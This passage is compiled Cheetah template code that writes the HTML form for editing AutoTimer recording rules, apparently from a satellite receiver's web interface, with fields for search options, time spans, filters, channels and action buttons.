_v = VFFSL(SL,"tstrings",True)['at_description_match'] # u"$tstrings['at_description_match']" on line 43, col 37
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_description_match']")) # from line 43, col 37.
write(u'''</option>
''')
if VFN(VFFSL(SL,"types",True),"has_key",False)('start'): # generated from line 44, col 9
write(u'''\t\t\t\t\t\t\t\t\t<option value="start">''')
_v = VFFSL(SL,"tstrings",True)['at_start_match'] # u"$tstrings['at_start_match']" on line 45, col 32
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_start_match']")) # from line 45, col 32.
write(u'''</option>
''')
write(u'''\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<!-- <br><label for="searchCase">''')
_v = VFFSL(SL,"tstrings",True)['at_search_strictness'] # u"$tstrings['at_search_strictness']" on line 48, col 42
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_search_strictness']")) # from line 48, col 42.
write(u''':</label> -->
\t\t\t\t\t\t\t\t<select name="searchCase" id="searchCase">
\t\t\t\t\t\t\t\t<option value="sensitive" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['at_case_sensitive'] # u"$tstrings['at_case_sensitive']" on line 50, col 55
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_case_sensitive']")) # from line 50, col 55.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="insensitive">''')
_v = VFFSL(SL,"tstrings",True)['at_case_insensitive'] # u"$tstrings['at_case_insensitive']" on line 51, col 37
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_case_insensitive']")) # from line 51, col 37.
write(u'''</option>
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<br><label for="justplay">''')
_v = VFFSL(SL,"tstrings",True)['at_timer_type'] # u"$tstrings['at_timer_type']" on line 53, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timer_type']")) # from line 53, col 35.
write(u''':</label>
\t\t\t\t\t\t\t\t<select name="justplay" id="justplay">
\t\t\t\t\t\t\t\t<option value="0" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['at_record'] # u"$tstrings['at_record']" on line 55, col 47
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_record']")) # from line 55, col 47.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="1">''')
_v = VFFSL(SL,"tstrings",True)['at_zap'] # u"$tstrings['at_zap']" on line 56, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_zap']")) # from line 56, col 27.
write(u'''</option>
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<label for="overrideAlternatives">''')
_v = VFFSL(SL,"tstrings",True)['at_override_alt'] # u"$tstrings['at_override_alt']" on line 58, col 43
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_override_alt']")) # from line 58, col 43.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="overrideAlternatives" id="overrideAlternatives" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t<br><label for="timeSpan">''')
_v = VFFSL(SL,"tstrings",True)['at_timespan'] # u"$tstrings['at_timespan']" on line 60, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timespan']")) # from line 60, col 35.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="timeSpan" id="timeSpan" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="timeSpanE">
\t\t\t\t\t\t\t\t\t<label for="from">''')
_v = VFFSL(SL,"tstrings",True)['at_timespan_begin'] # u"$tstrings['at_timespan_begin']" on line 63, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timespan_begin']")) # from line 63, col 28.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<input type="text" name="from" id="from" value="" class="text ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<label for="to">''')
_v = VFFSL(SL,"tstrings",True)['at_timespan_end'] # u"$tstrings['at_timespan_end']" on line 65, col 26
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timespan_end']")) # from line 65, col 26.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<input type="text" name="to" id="to" value="" class="text ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t<br><label for="timeFrame">''')
_v = VFFSL(SL,"tstrings",True)['at_datespan'] # u"$tstrings['at_datespan']" on line 68, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_datespan']")) # from line 68, col 36.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="timeFrame" id="timeFrame" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="timeFrameE">
\t\t\t\t\t\t\t\t\t<label for="after">''')
_v = VFFSL(SL,"tstrings",True)['at_datespan_before'] # u"$tstrings['at_datespan_before']" on line 71, col 29
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_datespan_before']")) # from line 71, col 29.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<input type="text" name="after" id="after" value="" class="text date ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<input type="checkbox" name="timeFrameAfter" id="timeFrameAfter" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<label for="before">''')
_v = VFFSL(SL,"tstrings",True)['at_datespan_after'] # u"$tstrings['at_datespan_after']" on line 74, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_datespan_after']")) # from line 74, col 30.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<span id="beforeE"><input type="text" name="before" id="before" value="" class="text date ui-widget-content ui-corner-all"></span>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t<br><label for="timerOffset">''')
_v = VFFSL(SL,"tstrings",True)['at_timer_offset'] # u"$tstrings['at_timer_offset']" on line 77, col 38
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timer_offset']")) # from line 77, col 38.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="timerOffset" id="timerOffset" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="timerOffsetE">
\t\t\t\t\t\t\t\t\t<label for="obefore">''')
_v = VFFSL(SL,"tstrings",True)['at_timer_offset_before'] # u"$tstrings['at_timer_offset_before']" on line 80, col 31
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timer_offset_before']")) # from line 80, col 31.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<select name="obefore" id="obefore">
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t<label for="oafter">''')
_v = VFFSL(SL,"tstrings",True)['at_timer_offset_after'] # u"$tstrings['at_timer_offset_after']" on line 83, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timer_offset_after']")) # from line 83, col 30.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<select name="oafter" id="oafter">
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t
\t\t\t\t\t\t\t\t<br><label for="maxDuration">''')
_v = VFFSL(SL,"tstrings",True)['at_max_duration'] # u"$tstrings['at_max_duration']" on line 88, col 38
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_max_duration']")) # from line 88, col 38.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="maxDuration" id="maxDuration" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="maxDurationE">
\t\t\t\t\t\t\t\t\t<label for="maxduration"></label>
\t\t\t\t\t\t\t\t\t<select name="maxduration" id="maxduration">
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t
\t\t\t\t\t\t\t\t<br><label for="afterevent">''')
_v = VFFSL(SL,"tstrings",True)['at_after_event'] # u"$tstrings['at_after_event']" on line 96, col 37
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_after_event']")) # from line 96, col 37.
write(u''':</label>
\t\t\t\t\t\t\t\t<select name="afterevent" id="afterevent">
\t\t\t\t\t\t\t\t<option value="" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['at_after_event_standard'] # u"$tstrings['at_after_event_standard']" on line 98, col 46
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_after_event_standard']")) # from line 98, col 46.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="none">''')
_v = VFFSL(SL,"tstrings",True)['at_after_event_nothing'] # u"$tstrings['at_after_event_nothing']" on line 99, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_after_event_nothing']")) # from line 99, col 30.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="standby">''')
_v = VFFSL(SL,"tstrings",True)['at_after_event_standby'] # u"$tstrings['at_after_event_standby']" on line 100, col 33
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_after_event_standby']")) # from line 100, col 33.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="shutdown">''')
_v = VFFSL(SL,"tstrings",True)['at_after_event_deepstandby'] # u"$tstrings['at_after_event_deepstandby']" on line 101, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_after_event_deepstandby']")) # from line 101, col 34.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="auto">''')
_v = VFFSL(SL,"tstrings",True)['at_after_event_auto'] # u"$tstrings['at_after_event_auto']" on line 102, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_after_event_auto']")) # from line 102, col 30.
write(u'''</option>
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<br><br><span id="AftereventE">
\t\t\t\t\t\t\t\t<label for="timeSpanAE">''')
_v = VFFSL(SL,"tstrings",True)['at_event_timespan'] # u"$tstrings['at_event_timespan']" on line 105, col 33
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_event_timespan']")) # from line 105, col 33.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="timeSpanAE" id="timeSpanAE" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="timeSpanAEE">
\t\t\t\t\t\t\t\t\t<br><br><label for="from">''')
_v = VFFSL(SL,"tstrings",True)['at_event_timespan_begin'] # u"$tstrings['at_event_timespan_begin']" on line 108, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_event_timespan_begin']")) # from line 108, col 36.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<input type="text" name="aefrom" id="aefrom" value="" class="text ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<br><br><label for="to">''')
_v = VFFSL(SL,"tstrings",True)['at_event_timespan_end'] # u"$tstrings['at_event_timespan_end']" on line 110, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_event_timespan_end']")) # from line 110, col 34.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<input type="text" name="aeto" id="aeto" value="" class="text ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t
\t\t\t\t\t\t\t\t<br><label for="counter">''')
_v = VFFSL(SL,"tstrings",True)['at_max_counter'] # u"$tstrings['at_max_counter']" on line 115, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_max_counter']")) # from line 115, col 34.
write(u''':</label>
\t\t\t\t\t\t\t\t<select name="counter" id="counter">
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<span id="CounterE">
\t\t\t\t\t\t\t\t<label for="left">''')
_v = VFFSL(SL,"tstrings",True)['at_left'] # u"$tstrings['at_left']" on line 119, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_left']")) # from line 119, col 27.
write(u''':</label>
\t\t\t\t\t\t\t\t<select name="left" id="left">
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<label for="counterFormat">''')
_v = VFFSL(SL,"tstrings",True)['at_reset_count'] # u"$tstrings['at_reset_count']" on line 122, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_reset_count']")) # from line 122, col 36.
write(u''':</label>
\t\t\t\t\t\t\t\t<select id="counterFormat" name="counterFormat" size="1">
\t\t\t\t\t\t\t\t<option value="" selected>''')
_v = VFFSL(SL,"tstrings",True)['at_never'] # u"$tstrings['at_never']" on line 124, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_never']")) # from line 124, col 35.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="%m">''')
_v = VFFSL(SL,"tstrings",True)['at_monthly'] # u"$tstrings['at_monthly']" on line 125, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_monthly']")) # from line 125, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="%U">''')
_v = VFFSL(SL,"tstrings",True)['at_weekly_sun'] # u"$tstrings['at_weekly_sun']" on line 126, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_weekly_sun']")) # from line 126, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="%W">''')
_v = VFFSL(SL,"tstrings",True)['at_weekly_mon'] # u"$tstrings['at_weekly_mon']" on line 127, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_weekly_mon']")) # from line 127, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t
\t\t\t\t\t\t\t\t<br><label for="avoidDuplicateDescription">''')
_v = VFFSL(SL,"tstrings",True)['at_avoid_dup'] # u"$tstrings['at_avoid_dup']" on line 131, col 52
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_avoid_dup']")) # from line 131, col 52.
write(u''':</label>
\t\t\t\t\t\t\t\t<select name="avoidDuplicateDescription" id="avoidDuplicateDescription">
\t\t\t\t\t\t\t\t<option value="0" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['at_avoid_dup_no'] # u"$tstrings['at_avoid_dup_no']" on line 133, col 47
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_avoid_dup_no']")) # from line 133, col 47.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="1">''')
_v = VFFSL(SL,"tstrings",True)['at_avoid_dup_same_service'] # u"$tstrings['at_avoid_dup_same_service']" on line 134, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_avoid_dup_same_service']")) # from line 134, col 27.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="2">''')
_v = VFFSL(SL,"tstrings",True)['at_avoid_dup_any_service'] # u"$tstrings['at_avoid_dup_any_service']" on line 135, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_avoid_dup_any_service']")) # from line 135, col 27.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="3">''')
_v = VFFSL(SL,"tstrings",True)['at_avoid_dup_any_service_rec'] # u"$tstrings['at_avoid_dup_any_service_rec']" on line 136, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_avoid_dup_any_service_rec']")) # from line 136, col 27.
write(u'''</option>
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<br><label for="Location">''')
_v = VFFSL(SL,"tstrings",True)['at_location'] # u"$tstrings['at_location']" on line 138, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_location']")) # from line 138, col 35.
write(u''':</label>
\t\t\t\t\t\t\t\t
\t\t\t\t\t\t\t\t<input type="checkbox" name="Location" id="Location" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="LocationE">
\t\t\t\t\t\t\t\t\t<label for="location"></label>
\t\t\t\t\t\t\t\t\t<select name="location" id="location">
''')
for location in VFFSL(SL,"locations",True): # generated from line 144, col 11
write(u'''\t\t\t\t\t\t\t\t\t\t\t<option value="''')
_v = VFFSL(SL,"location",True) # u'$location' on line 145, col 27
if _v is not None: write(_filter(_v, rawExpr=u'$location')) # from line 145, col 27.
write(u'''">''')
_v = VFFSL(SL,"location",True) # u'$location' on line 145, col 38
if _v is not None: write(_filter(_v, rawExpr=u'$location')) # from line 145, col 38.
write(u'''</option>
''')
write(u'''\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t\t
\t\t\t\t\t\t\t\t<br><label for="Tags">''')
_v = VFFSL(SL,"tstrings",True)['at_tags'] # u"$tstrings['at_tags']" on line 150, col 31
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_tags']")) # from line 150, col 31.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<span id="TagsE">
\t\t\t\t\t\t\t\t\t<select data-placeholder="''')
_v = VFFSL(SL,"tstrings",True)['at_select_tags'] # u"$tstrings['at_select_tags']" on line 152, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_select_tags']")) # from line 152, col 36.
write(u'''" name="tags" id="tags" class="tags_select_box" multiple tabindex="16">
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t<br><label for="Bouquets">''')
_v = VFFSL(SL,"tstrings",True)['at_bouquets'] # u"$tstrings['at_bouquets']" on line 155, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_bouquets']")) # from line 155, col 35.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="Bouquets" id="Bouquets" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="BouquetsE">
\t\t\t\t\t\t\t\t\t<select data-placeholder="''')
_v = VFFSL(SL,"tstrings",True)['at_select_bouquets'] # u"$tstrings['at_select_bouquets']" on line 158, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_select_bouquets']")) # from line 158, col 36.
write(u'''" name="bouquets" id="bouquets" class="bq_select_box" multiple tabindex="16">
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t<br><label for="Channels">''')
_v = VFFSL(SL,"tstrings",True)['at_channels'] # u"$tstrings['at_channels']" on line 161, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_channels']")) # from line 161, col 35.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="Channels" id="Channels" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="ChannelsE">
\t\t\t\t\t\t\t\t\t<select data-placeholder="''')
_v = VFFSL(SL,"tstrings",True)['at_select_channels'] # u"$tstrings['at_select_channels']" on line 164, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_select_channels']")) # from line 164, col 36.
write(u'''" name="channels" id="channels" class="ch_select_box" multiple tabindex="16">
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t<br>
\t\t\t\t\t\t\t\t<br>
\t\t\t\t\t\t\t\t<div>
\t\t\t\t\t\t\t\t<label for="Filter">''')
_v = VFFSL(SL,"tstrings",True)['at_filter'] # u"$tstrings['at_filter']" on line 170, col 29
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter']")) # from line 170, col 29.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="Filter" id="Filter" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="FilterE" style="display:inline-table">
\t\t\t\t\t\t\t\t\t<input type="button" id="AddFilter" value="''')
_v = VFFSL(SL,"tstrings",True)['at_add'] # u"$tstrings['at_add']" on line 173, col 53
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_add']")) # from line 173, col 53.
write(u'''"/>
\t\t\t\t\t\t\t\t\t<table id="filterlist">
\t\t\t\t\t\t\t\t\t<tr id="dummyfilter" style="display:none">
\t\t\t\t\t\t\t\t\t<td class="nopadding">
\t\t\t\t\t\t\t\t\t<select size="1" class="FT">
\t\t\t\t\t\t\t\t\t<option value="include" selected="">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_include'] # u"$tstrings['at_filter_include']" on line 178, col 46
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_include']")) # from line 178, col 46.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="exclude">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_exclude'] # u"$tstrings['at_filter_exclude']" on line 179, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_exclude']")) # from line 179, col 34.
write(u'''</option>
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</td>
\t\t\t\t\t\t\t\t\t<td class="nopadding">
\t\t\t\t\t\t\t\t\t<select size="1" class="FM">
\t\t\t\t\t\t\t\t\t<option value="title" selected="">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_title'] # u"$tstrings['at_filter_title']" on line 184, col 44
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_title']")) # from line 184, col 44.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="shortdescription">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_short_desc'] # u"$tstrings['at_filter_short_desc']" on line 185, col 43
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_short_desc']")) # from line 185, col 43.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="description">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_desc'] # u"$tstrings['at_filter_desc']" on line 186, col 38
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_desc']")) # from line 186, col 38.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="dayofweek">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_day'] # u"$tstrings['at_filter_day']" on line 187, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_day']")) # from line 187, col 36.
write(u'''</option>
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</td>
\t\t\t\t\t\t\t\t\t<td class="nopadding">
\t\t\t\t\t\t\t\t\t<input type="text" class="FI" size="20" value="" style="display: block;">
\t\t\t\t\t\t\t\t\t<select size="1" class="FS" style="display: none;">
\t\t\t\t\t\t\t\t\t<option value="0" selected="">''')
_v = VFFSL(SL,"tstrings",True)['monday'] # u"$tstrings['monday']" on line 193, col 40
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['monday']")) # from line 193, col 40.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="1">''')
_v = VFFSL(SL,"tstrings",True)['tuesday'] # u"$tstrings['tuesday']" on line 194, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['tuesday']")) # from line 194, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="2">''')
_v = VFFSL(SL,"tstrings",True)['wednesday'] # u"$tstrings['wednesday']" on line 195, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['wednesday']")) # from line 195, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="3">''')
_v = VFFSL(SL,"tstrings",True)['thursday'] # u"$tstrings['thursday']" on line 196, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['thursday']")) # from line 196, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="4">''')
_v = VFFSL(SL,"tstrings",True)['friday'] # u"$tstrings['friday']" on line 197, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['friday']")) # from line 197, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="5">''')
_v = VFFSL(SL,"tstrings",True)['saturday'] # u"$tstrings['saturday']" on line 198, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['saturday']")) # from line 198, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="6">''')
_v = VFFSL(SL,"tstrings",True)['sunday'] # u"$tstrings['sunday']" on line 199, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['sunday']")) # from line 199, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="weekend">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_weekend'] # u"$tstrings['at_filter_weekend']" on line 200, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_weekend']")) # from line 200, col 34.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="weekday">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_weekday'] # u"$tstrings['at_filter_weekday']" on line 201, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_weekday']")) # from line 201, col 34.
write(u'''</option>
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</td>
\t\t\t\t\t\t\t\t\t<td><input type="checkbox" name="RemoveFilter" id="RemoveFilterID" value="" class="FR checkbox"> ''')
_v = VFFSL(SL,"tstrings",True)['at_del'] # u"$tstrings['at_del']" on line 204, col 107
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_del']")) # from line 204, col 107.
write(u'''</td>
\t\t\t\t\t\t\t\t\t</tr>
\t\t\t\t\t\t\t\t\t</table>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t</div>
\t\t\t\t\t\t\t\t
''')
if VFFSL(SL,"hasVPS",True) == 1: # generated from line 210, col 9
write(u'''\t\t\t\t\t\t\t\t<br><label for="vps">''')
_v = VFFSL(SL,"tstrings",True)['vps'] # u"$tstrings['vps']" on line 211, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['vps']")) # from line 211, col 30.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="vps" id="vps" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t<span id="vpsE">
\t\t\t\t\t\t\t\t<label for="vpssm">''')
_v = VFFSL(SL,"tstrings",True)['safe_mode'] # u"$tstrings['safe_mode']" on line 214, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['safe_mode']")) # from line 214, col 28.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<input type="checkbox" name="vpssm" id="vpssm" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t</span>
''')
if VFFSL(SL,"hasSeriesPlugin",True) == 1: # generated from line 218, col 9
write(u'''\t\t\t\t\t\t\t\t<br><label for="seriesplugin">''')
_v = VFFSL(SL,"tstrings",True)['at_label_series'] # u"$tstrings['at_label_series']" on line 219, col 39
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_label_series']")) # from line 219, col 39.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="series_labeling" id="series_labeling" value="" class="checkbox ui-widget-content ui-corner-all">
''')
write(u'''\t\t\t\t\t\t\t</fieldset>
\t\t\t\t\t\t</form>
\t\t\t\t\t\t
\t\t\t\t\t\t<div class="ui-dialog-buttonpane ui-widget-content ui-helper-clearfix">
\t\t\t\t\t\t<div id="actions">
\t\t\t\t\t\t<button id="atbutton0">''')
_v = VFFSL(SL,"tstrings",True)['at_add'] # u"$tstrings['at_add']" on line 227, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_add']")) # from line 227, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton1">''')
_v = VFFSL(SL,"tstrings",True)['at_del'] # u"$tstrings['at_del']" on line 228, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_del']")) # from line 228, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton2">''')
_v = VFFSL(SL,"tstrings",True)['at_reload'] # u"$tstrings['at_reload']" on line 229, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_reload']")) # from line 229, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton3">''')
_v = VFFSL(SL,"tstrings",True)['at_save'] # u"$tstrings['at_save']" on line 230, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_save']")) # from line 230, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton4">''')
_v = VFFSL(SL,"tstrings",True)['at_parse'] # u"$tstrings['at_parse']" on line 231, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_parse']")) # from line 231, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton5">''')
_v = VFFSL(SL,"tstrings",True)['at_simulate'] # u"$tstrings['at_simulate']" on line 232, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_simulate']")) # from line 232, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton6">''')
_v = VFFSL(SL,"tstrings",True)['at_timers'] # u"$tstrings['at_timers']" on line 233, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timers']")) # from line 233, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton7">''')
_v = VFFSL(SL,"tstrings",True)['at_settings'] # u"$tstrings['at_settings']" on line 234, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_settings']")) # from line 234, col 30.
write(u'''</button>
\t\t\t\t\t\t</div></div>
\t\t\t\t\t\t<div id="errorbox" class="timerlist_row" style="color: red;">
\t\t<div class="ui-state-error ui-corner-all" style="padding: 0 .7em;">
\t\t\t<p><span class="ui-icon ui-icon-alert" style="float: left; margin-right: .3em;"></span>
\t\t\t<span id="error"></span>
\t\t\t<span id="success" style="color: green;"></span>
\t\t</div>
\t</div>
